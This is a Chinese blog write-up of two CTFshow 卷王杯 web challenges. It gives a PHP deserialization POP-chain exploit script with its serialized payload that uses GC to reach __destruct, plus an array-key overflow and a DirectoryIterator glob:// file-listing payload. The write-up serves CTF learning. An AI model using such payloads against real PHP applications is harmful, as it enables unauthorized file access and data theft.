CTFSHOW[卷王杯](上)

已于 2022-04-14 15:24:19 修改
阅读量2.9k 收藏 17
点赞数 2
分类专栏: 刷题+WP 文章标签: php 开发语言 安全 web安全
于 2022-03-19 20:28:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51295677/article/details/123553316
版权

这个比赛早在二月底就结束了,其实很早就想写wp了,但是有很多知识点没写,就拖到现在了。

easy unserialize

<?php
/**
 * @Author: F10wers_13eiCheng
 * @Date:   2022-02-01 11:25:02
 * @Last Modified by:   F10wers_13eiCheng
 * @Last Modified time: 2022-02-07 15:08:18
 */
include("./HappyYear.php");

class one {
    public $object;

    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }
        });
    }

    public function __destruct() {
        @$this->object->add();
    }

    public function __toString() {
        return $this->object->string;
    }
}

class second {
    protected $filename;

    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

if (isset($_GET["ctfshow"])) {
    $a=unserialize($_GET['ctfshow']);
    throw new Exception("高一新生报道");
} else {
    highlight_file(__FILE__);
}

这个题目有很多值得学习的冷知识,一起来看看吧。

有三个类,一看就知道是pop链,有throw new Exception();就知道要利用GC回收机制。还不知道怎么构造pop链或者不知道GC回收是什么的可以看我前面写的文章

PHP之序列化与反序列化(POP链篇)_errorr0的博客-CSDN博客浅谈PHP中GC回收机制的利用_errorr0的博客-CSDN博客

这个题目对我而言比较难的一个点就是pop链比较难凑,也就是说一眼看不出来。这个时候做题的思路就是随便找一个魔术方法,然后分析从哪到达这个魔术方法以及这个方法又会到哪去。

先分析几个冷门的知识。

第一个冷门知识

__call($func, $args)__get($name)中的变量如何控制:

<?php
class errorr0 {
    public $object;

    public function __construct()
    {
        $this->object = new errorr1();
        echo "__construct()\n";
        $this->object->string1;
    }
}
class errorr1 {
    public $filename;
    public function __get($a)
    {
        $this->filename = new errorr2();
        echo "__toString()\n";
		
		
        echo $a."\n";
        $this->filename->function1("bbb");
    }
}
class errorr2 {
    private $string;

    public function __call($a,$b)
    {
        echo "__call()\n";
		
		
        echo $a."\n";
		
        var_dump($b);
    }
}

$a = new errorr0();

?>

可见如果一个不可访问的属性被访问且调用了__get()方法后会将这个属性的值传给__get()的参数。 __call()也是一个道理,如果调用了一个不存在或不可访问的函数则会把函数名赋给__call()中的第一个变量,函数中的值则会赋给第二个参数,如上图。

第二个冷门知识

call_user_func();这个函数或许经常见,但如果是这个call_user_func([$this, $func."Me"], $args);的话呢?也就是说,第一个参数是数组。直接上测试图解释:

 可以看到,如果是数组的话,数组的第一个参数做类,第二个参数做方法。后面的"world" 做函数的参数。

 第三个冷门知识

array_walk()函数

这是菜鸟教程给的两个例子,可以了解大概的意思,我还是啰嗦的解释两句:array_walk()第一个参数是选择一个数组,第二个参数放一个函数,函数内的两个参数对选择的那个数组进行分别进行值、键匹配。但是!!题目给的是一个$this什么意思呢,就是遍历一个类,也就是说原本应该是匹配键的那个参数,现在会把一个变量当键匹配,而值就是本应该的值,这个时候我们的骚操作就是把值修改为数组就可以让$fn变为数组,最后匹配$fn[0]的时候通过就可以了。

第四个冷门知识

其实说这个是冷门知识比较牵强,可能对我来说比较坑吧!!

 前面讲过,__get()中的是由于访问了不可访问的属性,引起的调用,其中的参数值就是那个不能调用的属性,所以$name="string",有意思的来了,$this->$name,可以看到我给了红标记,本应该是$this->name的,但是现在是这个,而$name="string",所以最后$var = $this->string

所以最后其实就是$this->string['string']();,我们的目的就是让这个东西可以指向one::MeMeMe()最后就大功告成了。令$string = array("string"=>[new one(),"MeMeMe"]);即可以绕过,不要问我为什么可以,我也不晓得,我看官方wp是这样的

我想什么意思应该都知道,但是为啥可以这么用我是第一次知道 ,记住可以这么用就行。

构造exp

既然难点和重点都分析完了,那构造exp就是除开那些难点的简单pop链。分析完我就我不细说了,就是从one::__destruct()方法开始然后访问不存在的add()则触发second::__call(),然后触发自身的函数second::addMe(),在里面有个可以把对象连接字符串的点,所以连接到one::__toString(),再访问一个不可访问的值,连接third::__get(),最后到达one::MeMeMe()

构造的链子为:首部 --> one::__destruct() --> second::__call() --> second::addMe() --> one::__toString() --> third::__get() --> one::MeMeMe() --> 尾部

exp:

<?php

class one {
    public $object;

    public $year_parm = array(0=>"Happy_func");

}

class second {
    public $filename;

}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

$a = new one();
$b = new one();
$c = new second();
$d = new third(["string"=>[new one(),"MeMeMe"]]);

$a->object = $c;
$c->filename = $b;
$b->object = $d;

$n = NULL;
$m = array(0=>$a,1=>$n);


echo serialize($m);

这两个格子是不可见字符,这个我在前面讲pop链的文章中就提到过了 ,这里的不可见字符为%00

把下面这个1改为0实现GC利用。

最后得到的字符串为:

a:2:{i:0;O:3:"one":2:{s:6:"object";O:6:"second":1:{s:8:"filename";O:3:"one":2:{s:6:"object";O:5:"third":1:{s:13:"%00third%00string";a:1:{s:6:"string";a:2:{i:0;O:3:"one":2:{s:6:"object";N;s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:1;s:6:"MeMeMe";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:0;N;}

easyweb

数组键溢出 + PHP原生类读取。原生类知识量有点大,后面笔记补,这里考的原生类中的文件操作,可以百度搜索。

前端源码提示了source,访问得源码

 注意一个问题,第一层这里

这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有++$c,也就是说我们设置c为int可设置的最大值减1,等它自增后就可以达到溢出无法赋值的效果 ,不过不晓得为啥我在本地127.0.0.1并不能达到上面所说的效果,在服务器上测试倒可以。

 

 挺明了的,只需要令c = 9223372036854775806自增一次溢出就可以了。

接下来就是PHP原生类文件读取。

DirectoryIterator: DirectoryIterator类提供了一个查看文件系统目录内容的简单接口。 FilesystemIterator: 文件系统迭代器。
GlobIterator: 与glob()类似的方式迭代文件系统。

随便用一个就行,怎么用直接百度查查,我不细说了。

这里文件的名是加了md5的虽然可以用burp爆破,不过看wp用正则匹配就很灵性所以我偷个懒,直接照搬好了。

&a=DirectoryIterator&b=glob://flag[a-z0-9]*.php

最后直接读:

errorr0
关注
专栏目录
CTFshow-王杯-简单的re(复现)
ookami6497的博客
03-19 1254
普通的upx壳,放kali里面脱下壳就行 运行 进入主函数 __int64 sub_401165() { int v0; // edx int v1; // ecx int v2; // er8 int v3; // er9 __int64 result; // rax __int64 v5; // [rsp+8h] [rbp-1018h] char v6[112]; // [rsp+10h] [rbp-1010h] BYREF int v7; // [rs..
CTFshow王杯 | just pwn
rencvn的划水
03-06 677
开学期间太无聊了,和室友一起刷题,由于之前底子不好,卡住了一段时间,写写记录一下。 检查文件保护机制 开启了relro,pie和canary 将程序扔进ida里分析 找到main函数,想进行f5反汇编,但是报错无法逆出反汇编 错误具体原因出现在0x1257,我们跟进查看 这里时call rdx,在看上面的汇编 lea rdx,[rbp+buf] 实际上是将我们写如的内容进行call的操作,这里我在使用gdb调试的时候发现 栈可执行,并且栈上存在/bin/sh字符串 ...
ctfshow王杯
as you know, nlp is fantasitc!
03-05 594
ctfshow王杯 写在前面:这次的做出一道php题,通过这次的比赛,深入理解反序列化漏洞,通过复现学到了很多新的点 参考一篇特别详细的wp eazy unserialize(复现) 源码 <?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){
ctfshow-王杯
blowed的博客
02-28 814
ctfshow-王杯web
ctfshow(王杯)
qq_62046696的博客
09-24 1548
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow吃瓜杯 misc writeup
ashMOB的博客
11-15 857
ctfshow吃瓜杯 misc writeup 基本还是看着大佬wp去复现 ctfshow吃瓜杯 八月群赛 WriteUp/WP_是Mumuzi的博客-CSDN博客 Misc游戏签到 游戏题,比较看脸,因为遇到太多次靶场死机所以直接抄flag上去了 She Never Owns a Window 下载下来打开发现是一个文本文件,但是有许多空白换行和tab 提示说不是SNOW(Steganography -SNOW- AVariation:这是一种创新的 隐写 技术,可用于隐藏两个单词之间的空格后面的文本数据
ctfshow reverse36D杯
m0_58348028的博客
02-20 439
目录 签到 签到 发现这个题只要理解清楚他do-while循环中的东西就好了 推测v8即为flag 经过下面的处理之后才出flag上代码 int main() { char flag[31]; int v4; int v6; // [rsp+4h] [rbp-8Ch] unsigned int v7; // [rsp+8h] [rbp-88h] char v8; int v9[31]; char v10[4]; // [rsp+8Ch] [rbp-4h]
CTfshow 王杯 easy unserialize(特详)
Jay17的博客
05-12 601
CTfshow 王杯 easy unserialize(特详)
2022/03/14ctfshow王杯easy unserialize
A的博客
03-14 421
public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" && $prev === "year_parm") { global $talk; echo "$talk"."</br>"; global $flag; echo $fla
王问系统考试系统源码SurveyKing开源调查问和考试系统源码适用于各行业支持多种问设置
最新发布
08-09
王问考试系统/SurveyKing是一个功能最强大的开源调查问和考试系统,可以快速部署,并适用于各行业。该系统提供了在线表单设计、数据收集、统计和分析等功能,支持20多种题型,多种创建问方式和多种问设置。 无论您是需要进行市场调研、学术研究还是组织内部员工培训,王问考试系统都能满足您的需求。安装和部署非常简单,最快只需1分钟即可完成部署。 系统支持多种部署方式,包括一键Windows部署、一键Docker部署、前后端分离部署、单JAR部署和二级目录部署。
ctfshow王杯部分web
Pysnow's Blog
02-27 5603
ctfshow王杯web部分[easy unserialize&easy web] easy unserialize <?php /** * @Author: F10wers_13eiCheng * @Date: 2022-02-01 11:25:02 * @Last Modified by: F10wers_13eiCheng * @Last Modified time: 2022-02-07 15:08:18 */ include("./HappyYear.php");
2022-王杯-happyFastjson
feng的博客
03-02 1823
2022-王杯-happyFastjson 前言 昨天看了fastjson,因为最近比赛的fastjson出现的有点多。王杯Y4出了道fastjson的题目,考点是比较基础的东西,学习一波。 分析 import java.io.ByteArrayOutputStream; import java.io.InputStream; import java.util.HashMap; import java.util.Map; public class FlagBean { private int
王杯-部分Crypto-wp
mxx307的博客
03-11 1027
http://www.mxx307.com/index.php/%e5%8d%b7%e7%8e%8b%e6%9d%afwp/
ctfshow 月饼杯
akxnxbshai的博客
12-01 848
ctfshow练习。
前端通用问题型源码
菜鸟老五
04-15 1209
<template> <view> <!-- 消息 --> <view class=""> <u-top-tips ref="uTips"></u-top-tips> </view> <!-- --> <!-- 标签列表 --> <u-gap bgColo...
管理系统前端设计与实现计算机毕业设计源码71781
weixin_bysj1330的博客
07-17 153
SpringBoot问管理系统随着科学技术的飞速发展,社会的方方面面、各行各业都在努力与现代的先进技术接轨,通过科技手段来提高自身的优势,问调查当然也不例外。问管理系统是以实际运用为开发背景,运用软件工程原理和开发方法,采用Java技术构建的一个管理系统。整个开发过程首先对软件系统进行需求分析,得出系统的主要功能。接着对系统进行总体设计和详细设计。总体设计主要包括系统功能设计、系统总体结构设计、系统数据结构设计和系统安全设计等;详细设计主要包括系统数据库访问的实现,主要功能模块的具体实现,模块实现关键
王-开源调查问天花板
04-26 2017
网站链接https://surveyking.cn/ Gitee 开源地址https://gitee.com/surveyking/surveyking 王调查问系统和其他问系统对比结果。王提供的很多功能已经领先问网、腾讯问这些国内主流 saas 调查问服务。 问网 腾讯问星 金数据 填鸭企业版 调问企业版 王 演示 问调查 ✔️ ✔️ ✔️ ✔️ ✔️ ✔️ ✔️ Go .
节后充电!王必看的前端进阶指南来喽~
小北哥哥和北妈
05-04 265
本文推荐最近在考虑新机会的小伙伴阅读! 前言 上 周和部门BP聊天,她说最近在boss上放出一个初级前端岗位,平均每天都能收到500多份简历。 前端市场越来越,跳槽前做好技术进阶突击,才能稳拿offer。 这里有一份我爆肝两个月整理出的《2023前端开发进阶秘籍》,内含最新版本的八股文、高频算法题和大佬面经,全是今年的新知识点。...
ctfshow菜狗杯
07-28
很抱歉,我无法回答你的问题。因为你提供的引用内容与问题之间没有明确的关联。请提供更多相关的信息,以便我能够帮助你。 #### 引用[.reference_title] - *1* *2* *3* [CTFshow菜狗杯-misc-wp(详解 脚本 过程 全)](https://blog.csdn.net/m0_68012373/article/details/128960816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

errorr0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值